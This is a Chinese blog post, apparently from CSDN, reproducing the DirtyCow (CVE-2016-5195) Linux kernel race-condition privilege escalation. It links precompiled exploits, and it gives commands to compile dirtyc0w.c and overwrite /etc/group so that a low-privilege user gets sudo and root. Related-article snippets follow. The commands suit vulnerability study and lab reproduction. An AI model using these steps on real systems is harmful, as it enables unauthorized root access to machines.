DirtyCow(脏牛)漏洞复现

最新推荐文章于 2025-07-06 00:25:09 发布
原创 最新推荐文章于 2025-07-06 00:25:09 发布 · 2.8w 阅读 · 31 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

本文介绍了Linux内核的DirtyCow漏洞,如何在Ubuntu上复现提权过程,并展示了在Android平台上利用NDK编译及执行EXP的方法。详细步骤包括在Android Studio中安装NDK、下载源码、修改编译配置,以及不同Android版本的复现结果。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

该文章首发于: 90sec(九零) 文章链接: https://forum.90sec.com/t/topic/521

这几天发现90sec需要登录才能浏览文章,为了方便就把该文章也发在个人博客,并顺便把之前编译好的脏牛提权EXP也一块放出来。

编译好的EXP下载地址: https://github.com/Brucetg/DirtyCow-EXP

该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。

1.Linux

Ubuntu 14.04 :

1)添加用户: 

sudo adduser test

输入两次密码后一直回车就行,查看当前用户的信息,终端输入 id,回车,可以看到当 前用户是有 sudo 权限的。

切换到刚刚新建的 test 用户,同样输入 id,查看 test 用户的信息,发现 test 用户没有 sudo 权限,

2)运行DirtyCow的exp进行提权:

git clone https://github.com/dirtycow/dirtycow.github.io

cd dirtycow.github.io

编译exp:

gcc dirtyc0w.c -o dirtycow lpthread

执行exp:

./dirtycow /etc/group “$(sed ‘/\(sudo*\)/ s/$/,test/’ /etc/group)”

新打开一个终端,切换到test,查看test用户信息,可以看到test用户已经拥有了sudo权限,执行sudo su ,输入test用户的密码后就可以切换到root权限,提权成功。

漏洞成因:

Linux写时拷贝技术(copy-on-write)

在Linux系统中,fork()会产生一个和父进程完全相同的子进程,但子进程在此后多会exec系统调用,出于效率考虑,Linux系统中引入了“写时复制”技术,也就是只有进程空间的各段的内容要发生变化时,才会将父进程的内容复制一份给子进程。

2.Android:

Linux上编译好的exp在Android平台上不能用,使用NDK编译下载好的exp:

最低0.47元/天 解锁文章

200万优质内容无限畅学
Dirtycow(CVE-2016-5195)容器逃逸漏洞复现与分析
SHELLCODE_8BIT的博客
08-07 830
众所周知,操作系统为我们管理硬件资源,并以系统调用的方式对用户进程提供 API,但是 syscall 很慢,涉及陷入内核以及上下文切换。对于少量频繁调用的系统调用(比如获取当期系统时间)来说,是否可以某种安全的方式开放到用户空间,让用户直接访问而不需要经过 syscall 呢?vDSO 就是用来解决这个问题的。vDSO 全程为这个名词大家应该有所耳闻,就是 Linux 下的动态库的全称,而virtual表明,这个动态库是通过某种手段虚拟出来的,并不真正存在于 Linux 文件系统中。
DirtyCow漏洞复现(新、、大、Linux、Android、提权)
墨痕诉清风的博客
02-25 2775
编译好的EXP下载地址:https://github.com/Brucetg/DirtyCow-EXP 该漏洞是 Linux 内核的内存子系统在处理写时拷贝(Copy-on-Write)时存在条件竞争漏洞, 导致可以破坏私有只读内存映射。黑客可以在获取低权限的的本地用户后,利用此漏洞获取 其他只读内存映射的写权限,进一步获取 root 权限。 1.Linux Ubuntu 14.04 : 1)添加用户: sudo adduser test 输入两次密码后一直回车就行,查看当前用户的..
dirtycow 漏洞复现 (CVE-2016-5195)
box
10-29 1197
漏洞描述: 漏洞编号:CVE-2016-5195 漏洞名称:(Dirty COW) 漏洞危害:低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权 影响范围:Linux内核>=2.6.22(2007年发行)开始就受影响了,直到2016年10月18日才修复。 360 Vulpecker Team:Android 7.0最新的10月补丁...
漏洞复现(CVE-2016-5195)
whojoe的博客
03-04 1125
漏洞复现(CVE-2016-5195)环境准备环境webshell来进行操作无webshell机器出网机器不出网EXP1EXP2 环境准备 查看系统版本并且添加用户 uname -a 切换用户 环境 webshell来进行操作 只需要通过webshell在/tmp目录下写入文件即可 无webshell 机器出网 例如机器出网,但是只能执行命令,那么就需要使用命令来下载 机器不出网 这种比较麻烦,通过echo逐行写入即可 这里使用无webshell,但是目标出网的方法 可以使用github,也可以使
提权(Dirty COW)
最新发布
m0_73399576的博客
07-06 702
知识面,决定看到的攻击面有多广。知识链,决定发动的杀伤链有多深。
DirtyCow漏洞复现(CVE-2016-5195)
tpaer的博客
11-16 2980
本文以vulnhub靶场中的lampiao为例复现提权漏洞
Linux提权漏洞复现(CVE-2016-5195)
小千安全
05-06 937
漏洞是一个严重的漏洞,可以允许攻击者获得管理员权限。为了保护系统的安全,请及时更新内核并采取其他安全措施。
【CVE复现NO.00001】“漏洞CVE-2016-5195复现及简要分析
arttnba3的博客
04-16 4359
【CVE复现NO.00001】CVE-2016-5195复现及简要分析[github blog addr](https://arttnba3.cn/2021/04/08/NOTE-0X04-CVE-2016-5195/)0x00.一切开始之前一、写时复制机制(Copy-on-Write)basic COWmmap 与 COW二、缺页异常(page fault)分类①软性缺页异常(soft page fault)②硬性缺页异常(hard page fault)③无效缺页异常(invalid page faul
DirtyCow提权漏洞复现(CVE-2016-5195)1
08-08
(Dirty Cow)漏洞,全称为“竞争条件写入时复制”(Copy-on-Write Race Condition),在2016年被发现,其安全漏洞编号为CVE-2016-5195。这个漏洞主要影响的是Linux内核,特别是从2007年的2.6.22版本到修复前的...
漏洞(CVE-2016-5195)复现过程(详细完整版)
qq_40898302的博客
01-19 4079
KaLi 攻击机Linux靶机 靶场实验目的:掌握漏洞利用的方法掌握漏洞的原理提高对内核安全性的认识。
DirtyCow-EXP:编译好的漏洞(CVE-2016-5195)EXP
05-16
DirtyCow-EXP 编译好的漏洞(CVE-2016-5195)EXP,分为 Linux 平台 和 Android 平台。 漏洞详细复现过程请参考:
漏洞合集
SHELLCODE_8BIT的博客
12-22 523
9.CVE-2016-5195()内核提权漏洞分析 - bmjoker - 博客园 JenI's Blog (jenisec.org) CVE-2016-5195/dcow.cpp at master · gbonacini/CVE-2016-5195 · GitHubLinux提权—漏洞(CVE-2016-5195)_谢公子的博客-优快云博客_漏洞
Dirtycow: dirty0w.c(漏洞
qq_40976667的博客
02-11 1361
/* ####################### dirtyc0w.c ####################### $ sudo -s # echo this is not a test > foo # chmod 0404 foo $ ls -lah foo -r-----r-- 1 root root 19 Oct 20 15:23 foo $ cat foo this is not a test $ gcc -pthread dirtyc0w.c -o dirtyc0w $ ./dirt
Linux提权—漏洞(CVE-2016-5195)
热门推荐
谢公子的博客
07-25 3万+
目录 漏洞 exp1复现: exp2复现漏洞 漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。 漏洞范围:Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复) 简要分析:该漏洞具体...
漏洞复现(CVE-2016-5195)
xiaolong22333的博客
09-10 762
漏洞可以让低权限的用户通过该漏洞完成本地提取 内核版本>=2.6.22 查看内核版本 uname -r 此时还是普通用户 exp地址 https://github.com/gbonacini/CVE-2016-5195.git 上传exp 编译 make 此时会生成可执行文件 执行就会返回root权限的shell ./dcow -s ...
提权漏洞复现(CVE-2016-5159)
1匹黑马
02-22 1662
文章目录影响范围危害漏洞原理漏洞利用 影响范围 Linux kernel >= 2.6.22(2007年发行,到2016年10月18日前所有发行版本) 危害 普通权限用户执行编译后的exp直接提权成root用户 漏洞原理 get_user_page内核函数在处理Copy-on-Write(以下使用COW表示)的过程中,产出竞态条件造成COW过程被破坏,导致出现写数据到进程地址空间内只读内存区...
漏洞复现- - -CVE-2016-5195 Dirty Cow提权漏洞
weixin_67503304的博客
11-02 4956
本文主要讲解了漏洞的提全过程及其修复建议。
Linux提权—漏洞(CVE-2016-5195)复现
qq_40898302的博客
04-02 2270
漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。【影响版本】:该漏洞在全版本Linux系统(Linux kernel >= 2.6.22)均可以实现提权,受影响的镜像版本为:CentOS 5.x 32位/64位CentOS 6.x 32位/64位CentOS 7.x 32位/64位CoreOS 717.3.0 64位。
提权(靶机复现
tubug的博客
03-26 4630
漏洞,又叫Dirty COW,存在Linux内核中已经有长达9年的时间,在2007年发布的Linux内核版本中就已经存在此漏洞。Linux kernel团队在2016年10月18日已经对此进行了修复。漏洞范围Linux内核 >= 2.6.22(2007年发行,到2016年10月18日才修复)漏洞编号的CVE编号是CVE-2016-5195。漏洞危害低权限用户利用该漏洞技术可以在全版本Linux系统上实现本地提权漏洞原理。
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值